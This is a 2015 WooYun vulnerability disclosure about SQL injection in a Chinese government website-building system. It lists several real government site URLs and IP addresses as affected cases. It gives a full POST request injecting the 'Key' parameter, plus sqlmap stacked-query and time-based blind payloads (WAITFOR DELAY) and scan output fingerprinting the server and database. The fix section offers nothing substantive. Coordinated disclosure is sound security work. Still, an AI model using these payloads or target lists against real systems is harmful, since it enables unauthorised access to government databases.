当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103128

漏洞标题:某通用型政府建站系统SQL注入

相关厂商:南京擎天科技

漏洞作者: 路人甲

提交时间:2015-03-24 15:12

修复时间:2015-06-25 16:42

公开时间:2015-06-25 16:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-24: 细节已通知厂商并且等待厂商处理中
2015-03-27: 厂商已经确认,细节仅向厂商公开
2015-03-30: 细节向第三方安全合作伙伴开放
2015-05-21: 细节向核心白帽子及相关领域专家公开
2015-05-31: 细节向普通白帽子公开
2015-06-10: 细节向实习白帽子公开
2015-06-25: 细节向公众公开

简要描述:

某通用型政府建站系统SQL注入 再来一发

详细说明:

南京擎天科技开发的政府建站系统存在一处SQL注入
案例:
http://61.178.185.50/lzweb/webpages/webusercaselist.aspx
http://qlgk.taixing.gov.cn/webpages/webusercaselist.aspx
http://58.222.216.220/ggweb/webpages/webusercaselist.aspx
http://58.222.211.21/webpages/webusercaselist.aspx
http://61.178.185.50/wwweb/webpages/webusercaselist.aspx
http://qlgk.jingjiang.gov.cn/webpages/webusercaselist.aspx

漏洞证明:

post下参数key存在注入
测试http://58.222.211.21/webpages/webusercaselist.aspx 

POST /webpages/webusercaselist.aspx HTTP/1.1
Host: 58.222.211.21
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DontTrackMeHere: gzip, deflate
Referer: http://58.222.211.21/webpages/webusercaselist.aspx
Cookie: webuserid=1; companyname=黄鹏
X-Forwarded-For: '
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 2496
__EVENTTARGET=Btn_Search&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=
%2FwEPDwULLTExOTA2NTQ1MjMPZBYCAgMPZBYGAgEPDxYEHglNYXhMZW5ndGgCCh4EVGV4dAUKMjAxNS0wMy0wMRY
YHghvbGRWYWx1ZQUKMjAxNS0wMy0wMR4IbGFuZ3VhZ2UFCmphdmFzY3JpcHQeBm9uYmx1cgUhdHJ5e19fdGltZV9i
bHVyKHRoaXMpO31jYXRjaChlKXt9HgdvbmtleXVwBSJ0cnl7X190aW1lX2tleXVwKHRoaXMpO31jYXRjaChlKXt9H
gdvbmNsaWNrBSJ0cnl7X190aW1lX2NsaWNrKHRoaXMpO31jYXRjaChlKXt9Hg1vbmNvbnRleHRtZW51BSh0cnl7X1
90aW1lX2NvbnRleHRtZW51KHRoaXMpO31jYXRjaChlKXt9HghvbmNoYW5nZQUjdHJ5e19fdGltZV9jaGFuZ2UodGh
pcyk7fWNhdGNoKGUpe30eCW9ua2V5ZG93bgUkdHJ5e19fdGltZV9rZXlkb3duKHRoaXMpO31jYXRjaChlKXt9Hgtv
bm1vdXNlbW92ZQUmdHJ5e19fdGltZV9tb3VzZW1vdmUodGhpcyk7fWNhdGNoKGUpe30eCm9ua2V5cHJlc3MFJXRye
XtfX3RpbWVfa2V5cHJlc3ModGhpcyk7fWNhdGNoKGUpe30eBXN0eWxlBXU7YmFja2dyb3VuZC1pbWFnZTp1cmwoJy
4uL2luYy9Ta3lEYXRlVGltZUN0cmxfbGliLmdpZicpO2JhY2tncm91bmQtcG9zaXRpb246cmlnaHQgY2VudGVyO2J
hY2tncm91bmQtcmVwZWF0Om5vLXJlcGVhdDseCXR4dF90eXBlcwUKeXl5eS1tbS1kZGQCAw8PFgQfAAIKHwEFCjIw
MTUtMDMtMjIWGB8CBQoyMDE1LTAzLTIyHwMFCmphdmFzY3JpcHQfBAUhdHJ5e19fdGltZV9ibHVyKHRoaXMpO31jY
XRjaChlKXt9HwUFInRyeXtfX3RpbWVfa2V5dXAodGhpcyk7fWNhdGNoKGUpe30fBgUidHJ5e19fdGltZV9jbGljay
h0aGlzKTt9Y2F0Y2goZSl7fR8HBSh0cnl7X190aW1lX2NvbnRleHRtZW51KHRoaXMpO31jYXRjaChlKXt9HwgFI3R
yeXtfX3RpbWVfY2hhbmdlKHRoaXMpO31jYXRjaChlKXt9HwkFJHRyeXtfX3RpbWVfa2V5ZG93bih0aGlzKTt9Y2F0
Y2goZSl7fR8KBSZ0cnl7X190aW1lX21vdXNlbW92ZSh0aGlzKTt9Y2F0Y2goZSl7fR8LBSV0cnl7X190aW1lX2tle
XByZXNzKHRoaXMpO31jYXRjaChlKXt9HwwFdTtiYWNrZ3JvdW5kLWltYWdlOnVybCgnLi4vaW5jL1NreURhdGVUaW
1lQ3RybF9saWIuZ2lmJyk7YmFja2dyb3VuZC1wb3NpdGlvbjpyaWdodCBjZW50ZXI7YmFja2dyb3VuZC1yZXBlYXQ
6bm8tcmVwZWF0Ox8NBQp5eXl5LW1tLWRkZAILDxQrAAsPFhAeC18hSXRlbUNvdW50Zh4IRGF0YUtleXMWAB4QQ3Vy
cmVudFBhZ2VJbmRleGYeCVBhZ2VDb3VudAIBHhVfIURhdGFTb3VyY2VJdGVtQ291bnRmHglJdGVtQ291bnRmHglQY
WdlSW5kZXhmHhBWaXJ0dWFsSXRlbUNvdW50Ag9kFCsAAzwrAAQBABYCHgpIZWFkZXJUZXh0BSs8Tk9CUj4mbmJzcD
vnlLPor7fkuovpobnlkI3np7AmbmJzcDs8L05PQlI%2BPCsABAEAFgIfFgUlPE5PQlI%2BJm5ic3A75o
%2BQ5Lqk5pe26Ze0Jm5ic3A7PC9OT0JSPjwrAAQBABYCHxYFJTxOT0JSPiZuYnNwO%2BS6i
%2BmhueeKtuaAgSZuYnNwOzwvTk9CUj4WBB4IQ3NzQ2xhc3MFCERHX1BhcGVyHgRfIVNCAgIWBB8XBQlER19IZWFk
ZXIfGAICFgQfFwUJREdfRm9vdGVyHxgCAhYEHxcFB0RHX0l0ZW0fGAICFgQfFwUIREdfQWx0ZXIfGAICZGQWBB8XB
QhER19UYWJsZR8YAgJkFgJmD2QWBGYPZBYCZg9kFgICDQ8QZGQWAGQCAw9kFgJmD2QWAgINDxBkZBYAZGQ52zQOb
%2BIXzg2C%2FYTrdYF35Ytgzw%3D%3D&__VIEWSTATEGENERATOR=6CA1BC1E&__EVENTVALIDATION=
%2FwEWBwKQzrSCBwKSiMWBDQLcnpxKAoKB9NcJAsukjhsChPitwg8C5JO45gIMNC92kClAgYvtAVfa
%2FWieTprTBw%3D%3D&Ctr_BeginTime=2015-03-01&Ctr_EndTime=2015-03-22&Key=%27


Place: POST
Parameter: Key
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=Btn_Search&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=
/wEPDwULLTExOTA2NTQ1MjMPZBYCAgMPZBYGAgEPDxYEHglNYXhMZW5ndGgCCh4EVGV4dAUKMjAxNS0w
My0wMRYYHghvbGRWYWx1ZQUKMjAxNS0wMy0wMR4IbGFuZ3VhZ2UFCmphdmFzY3JpcHQeBm9uYmx1cgUh
dHJ5e19fdGltZV9ibHVyKHRoaXMpO31jYXRjaChlKXt9HgdvbmtleXVwBSJ0cnl7X190aW1lX2tleXVw
KHRoaXMpO31jYXRjaChlKXt9HgdvbmNsaWNrBSJ0cnl7X190aW1lX2NsaWNrKHRoaXMpO31jYXRjaChl
KXt9Hg1vbmNvbnRleHRtZW51BSh0cnl7X190aW1lX2NvbnRleHRtZW51KHRoaXMpO31jYXRjaChlKXt9
HghvbmNoYW5nZQUjdHJ5e19fdGltZV9jaGFuZ2UodGhpcyk7fWNhdGNoKGUpe30eCW9ua2V5ZG93bgUk
dHJ5e19fdGltZV9rZXlkb3duKHRoaXMpO31jYXRjaChlKXt9Hgtvbm1vdXNlbW92ZQUmdHJ5e19fdGlt
ZV9tb3VzZW1vdmUodGhpcyk7fWNhdGNoKGUpe30eCm9ua2V5cHJlc3MFJXRyeXtfX3RpbWVfa2V5cHJl
c3ModGhpcyk7fWNhdGNoKGUpe30eBXN0eWxlBXU7YmFja2dyb3VuZC1pbWFnZTp1cmwoJy4uL2luYy9T
a3lEYXRlVGltZUN0cmxfbGliLmdpZicpO2JhY2tncm91bmQtcG9zaXRpb246cmlnaHQgY2VudGVyO2Jh
Y2tncm91bmQtcmVwZWF0Om5vLXJlcGVhdDseCXR4dF90eXBlcwUKeXl5eS1tbS1kZGQCAw8PFgQfAAIK
HwEFCjIwMTUtMDMtMjIWGB8CBQoyMDE1LTAzLTIyHwMFCmphdmFzY3JpcHQfBAUhdHJ5e19fdGltZV9i
bHVyKHRoaXMpO31jYXRjaChlKXt9HwUFInRyeXtfX3RpbWVfa2V5dXAodGhpcyk7fWNhdGNoKGUpe30f
BgUidHJ5e19fdGltZV9jbGljayh0aGlzKTt9Y2F0Y2goZSl7fR8HBSh0cnl7X190aW1lX2NvbnRleHRt
ZW51KHRoaXMpO31jYXRjaChlKXt9HwgFI3RyeXtfX3RpbWVfY2hhbmdlKHRoaXMpO31jYXRjaChlKXt9
HwkFJHRyeXtfX3RpbWVfa2V5ZG93bih0aGlzKTt9Y2F0Y2goZSl7fR8KBSZ0cnl7X190aW1lX21vdXNl
bW92ZSh0aGlzKTt9Y2F0Y2goZSl7fR8LBSV0cnl7X190aW1lX2tleXByZXNzKHRoaXMpO31jYXRjaChl
KXt9HwwFdTtiYWNrZ3JvdW5kLWltYWdlOnVybCgnLi4vaW5jL1NreURhdGVUaW1lQ3RybF9saWIuZ2lm
Jyk7YmFja2dyb3VuZC1wb3NpdGlvbjpyaWdodCBjZW50ZXI7YmFja2dyb3VuZC1yZXBlYXQ6bm8tcmVw
ZWF0Ox8NBQp5eXl5LW1tLWRkZAILDxQrAAsPFhAeC18hSXRlbUNvdW50Zh4IRGF0YUtleXMWAB4QQ3Vy
cmVudFBhZ2VJbmRleGYeCVBhZ2VDb3VudAIBHhVfIURhdGFTb3VyY2VJdGVtQ291bnRmHglJdGVtQ291
bnRmHglQYWdlSW5kZXhmHhBWaXJ0dWFsSXRlbUNvdW50Ag9kFCsAAzwrAAQBABYCHgpIZWFkZXJUZXh0
BSs8Tk9CUj4mbmJzcDvnlLPor7fkuovpobnlkI3np7AmbmJzcDs8L05PQlI+PCsABAEAFgIfFgUlPE5P
QlI+Jm5ic3A75o+Q5Lqk5pe26Ze0Jm5ic3A7PC9OT0JSPjwrAAQBABYCHxYFJTxOT0JSPiZuYnNwO+S6
i+mhueeKtuaAgSZuYnNwOzwvTk9CUj4WBB4IQ3NzQ2xhc3MFCERHX1BhcGVyHgRfIVNCAgIWBB8XBQlE
R19IZWFkZXIfGAICFgQfFwUJREdfRm9vdGVyHxgCAhYEHxcFB0RHX0l0ZW0fGAICFgQfFwUIREdfQWx0
ZXIfGAICZGQWBB8XBQhER19UYWJsZR8YAgJkFgJmD2QWBGYPZBYCZg9kFgICDQ8QZGQWAGQCAw9kFgJm
D2QWAgINDxBkZBYAZGQ52zQOb+IXzg2C/YTrdYF35Ytgzw==&__VIEWSTATEGENERATOR=6CA1BC1E&_
_EVENTVALIDATION=/wEWBwKQzrSCBwKSiMWBDQLcnpxKAoKB9NcJAsukjhsChPitwg8C5JO45gIMNC9
2kClAgYvtAVfa/WieTprTBw==&Ctr_BeginTime=2015-03-01&Ctr_EndTime=2015-03-22&Key=')
; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=Btn_Search&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=
/wEPDwULLTExOTA2NTQ1MjMPZBYCAgMPZBYGAgEPDxYEHglNYXhMZW5ndGgCCh4EVGV4dAUKMjAxNS0w
My0wMRYYHghvbGRWYWx1ZQUKMjAxNS0wMy0wMR4IbGFuZ3VhZ2UFCmphdmFzY3JpcHQeBm9uYmx1cgUh
dHJ5e19fdGltZV9ibHVyKHRoaXMpO31jYXRjaChlKXt9HgdvbmtleXVwBSJ0cnl7X190aW1lX2tleXVw
KHRoaXMpO31jYXRjaChlKXt9HgdvbmNsaWNrBSJ0cnl7X190aW1lX2NsaWNrKHRoaXMpO31jYXRjaChl
KXt9Hg1vbmNvbnRleHRtZW51BSh0cnl7X190aW1lX2NvbnRleHRtZW51KHRoaXMpO31jYXRjaChlKXt9
HghvbmNoYW5nZQUjdHJ5e19fdGltZV9jaGFuZ2UodGhpcyk7fWNhdGNoKGUpe30eCW9ua2V5ZG93bgUk
dHJ5e19fdGltZV9rZXlkb3duKHRoaXMpO31jYXRjaChlKXt9Hgtvbm1vdXNlbW92ZQUmdHJ5e19fdGlt
ZV9tb3VzZW1vdmUodGhpcyk7fWNhdGNoKGUpe30eCm9ua2V5cHJlc3MFJXRyeXtfX3RpbWVfa2V5cHJl
c3ModGhpcyk7fWNhdGNoKGUpe30eBXN0eWxlBXU7YmFja2dyb3VuZC1pbWFnZTp1cmwoJy4uL2luYy9T
a3lEYXRlVGltZUN0cmxfbGliLmdpZicpO2JhY2tncm91bmQtcG9zaXRpb246cmlnaHQgY2VudGVyO2Jh
Y2tncm91bmQtcmVwZWF0Om5vLXJlcGVhdDseCXR4dF90eXBlcwUKeXl5eS1tbS1kZGQCAw8PFgQfAAIK
HwEFCjIwMTUtMDMtMjIWGB8CBQoyMDE1LTAzLTIyHwMFCmphdmFzY3JpcHQfBAUhdHJ5e19fdGltZV9i
bHVyKHRoaXMpO31jYXRjaChlKXt9HwUFInRyeXtfX3RpbWVfa2V5dXAodGhpcyk7fWNhdGNoKGUpe30f
BgUidHJ5e19fdGltZV9jbGljayh0aGlzKTt9Y2F0Y2goZSl7fR8HBSh0cnl7X190aW1lX2NvbnRleHRt
ZW51KHRoaXMpO31jYXRjaChlKXt9HwgFI3RyeXtfX3RpbWVfY2hhbmdlKHRoaXMpO31jYXRjaChlKXt9
HwkFJHRyeXtfX3RpbWVfa2V5ZG93bih0aGlzKTt9Y2F0Y2goZSl7fR8KBSZ0cnl7X190aW1lX21vdXNl
bW92ZSh0aGlzKTt9Y2F0Y2goZSl7fR8LBSV0cnl7X190aW1lX2tleXByZXNzKHRoaXMpO31jYXRjaChl
KXt9HwwFdTtiYWNrZ3JvdW5kLWltYWdlOnVybCgnLi4vaW5jL1NreURhdGVUaW1lQ3RybF9saWIuZ2lm
Jyk7YmFja2dyb3VuZC1wb3NpdGlvbjpyaWdodCBjZW50ZXI7YmFja2dyb3VuZC1yZXBlYXQ6bm8tcmVw
ZWF0Ox8NBQp5eXl5LW1tLWRkZAILDxQrAAsPFhAeC18hSXRlbUNvdW50Zh4IRGF0YUtleXMWAB4QQ3Vy
cmVudFBhZ2VJbmRleGYeCVBhZ2VDb3VudAIBHhVfIURhdGFTb3VyY2VJdGVtQ291bnRmHglJdGVtQ291
bnRmHglQYWdlSW5kZXhmHhBWaXJ0dWFsSXRlbUNvdW50Ag9kFCsAAzwrAAQBABYCHgpIZWFkZXJUZXh0
BSs8Tk9CUj4mbmJzcDvnlLPor7fkuovpobnlkI3np7AmbmJzcDs8L05PQlI+PCsABAEAFgIfFgUlPE5P
QlI+Jm5ic3A75o+Q5Lqk5pe26Ze0Jm5ic3A7PC9OT0JSPjwrAAQBABYCHxYFJTxOT0JSPiZuYnNwO+S6
i+mhueeKtuaAgSZuYnNwOzwvTk9CUj4WBB4IQ3NzQ2xhc3MFCERHX1BhcGVyHgRfIVNCAgIWBB8XBQlE
R19IZWFkZXIfGAICFgQfFwUJREdfRm9vdGVyHxgCAhYEHxcFB0RHX0l0ZW0fGAICFgQfFwUIREdfQWx0
ZXIfGAICZGQWBB8XBQhER19UYWJsZR8YAgJkFgJmD2QWBGYPZBYCZg9kFgICDQ8QZGQWAGQCAw9kFgJm
D2QWAgINDxBkZBYAZGQ52zQOb+IXzg2C/YTrdYF35Ytgzw==&__VIEWSTATEGENERATOR=6CA1BC1E&_
_EVENTVALIDATION=/wEWBwKQzrSCBwKSiMWBDQLcnpxKAoKB9NcJAsukjhsChPitwg8C5JO45gIMNC9
2kClAgYvtAVfa/WieTprTBw==&Ctr_BeginTime=2015-03-01&Ctr_EndTime=2015-03-22&Key=')
 WAITFOR DELAY '0:0:5'--
---
[00:11:46] [INFO] testing Microsoft SQL Server
[00:11:46] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[00:12:14] [INFO] confirming Microsoft SQL Server
[00:12:24] [INFO] adjusting time delay to 1 second due to good response times
[00:13:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[00:13:38] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 814 times
[00:13:38] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp
ut\58.222.211.21'
[*] shutting down at 00:13:38

修复方案:

RT

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-03-27 16:42

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置.

最新状态:

暂无